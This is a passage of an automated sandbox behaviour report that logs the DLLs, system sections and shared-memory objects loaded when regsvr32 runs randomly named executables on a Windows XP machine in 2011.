Imagebase: 0x1000000
File size: 11776 bytes
MD5 hash: FBDB9D0935B9907B809B381FDDF1627F
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 774E0000 1302528 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 6F880000 1875968 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8B0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 8B0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 8B0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 8C0000 262144 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\0.7663042396006076.exe write and read and execute unknown 8C0000 262144 own pid read write object name not found 1 1001DBE
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe query and write and read and execute image 1010000 38506496 own pid read write conflicting addresses 1 1001DBE
User Activities:
+ Window enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address
0 0 false 508 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2 1001E31
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2576144936
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2576148875
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2576153184
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2576164493
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2576168884
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2576172434
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2576174026
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2576174403
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2576177383
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2576184755
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2576190804
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2576198118
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2576217318
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2576218555
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2576236660
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid object name not found 2576260896
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2576263877
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2576279922
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2576298710
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2576301206
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2576305956
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid object name not found 2576312994
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2576317711
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2576332029
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2576347874
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2576349363
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2576363457
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2576369364
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2576394018
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2576412405
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2576421842
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2576423311
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2576448454
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2576474417
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2576476937
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2576481277
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1010000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2576709763
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2576782394
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2576788256
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2576800436
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2576803242
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2576805448
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2576953558
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2577203401
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2577565463
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2578280313
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 2578329209
Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 2578578575
Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 2578585311
Section loaded Path: \KnownDlls\0.7663042396006076.exe Access: write and read and execute Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid object name not found 2578589287
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: query and write and read and execute Type: image Baseaddress: 1010000 Size: 38506496 Protection: read write Mapped to pid: own pid conflicting addresses 2578591574
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 508 HWNDs: 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2578652356
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 508 HWNDs: 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2578654141
Analysis File: regsvr32.exe PID: 1004 Parent PID: 1712
+ Sections
+ General
Start time: 05:44:28
Start date: 08/12/2011
Path: C:\WINDOWS\system32\regsvr32.exe
Commandline: regsvr32 -s 0.3635417184612467.exe
Imagebase: 0x1000000
File size: 11776 bytes
MD5 hash: FBDB9D0935B9907B809B381FDDF1627F
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 774E0000 1302528 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 6F880000 1875968 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8B0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 8B0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 8B0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 8C0000 262144 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\0.3635417184612467.exe write and read and execute unknown 8C0000 262144 own pid read write object name not found 1 1001DBE
C:\Documents and Settings\Administrator\Desktop\0.3635417184612467.exe query and write and read and execute image 8C0000 262144 own pid read write invalid file for section 1 1001DBE
User Activities:
+ Window enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address
0 0 false 6CC 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2 1001E31
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2583556438
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2583560552
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2583564301
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2583565672
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2583566799
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2583567565
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2583569062
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2583569437
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2583570814
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2583575055
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2583578232
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2583582267
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2583588955
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2583590212
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2583598231
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid object name not found 2583605909
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2583607709
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2583613004
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2583623809
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2583626257
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2583628359
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid object name not found 2583632826
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2583634290
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2583640628
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2583646762
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2583648217
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2583655193
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2583658216
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2583664635
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2583674197
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2583679764
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2583681224
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2583689642
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2583707995
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2583710626
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2583712770
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1010000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2583866451
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2583931594
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2583934359
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2583944294
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2583947221
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2583953954
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2583989352
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2583999882
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2584032479
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2584146538
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 2584149178
Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 2584157065
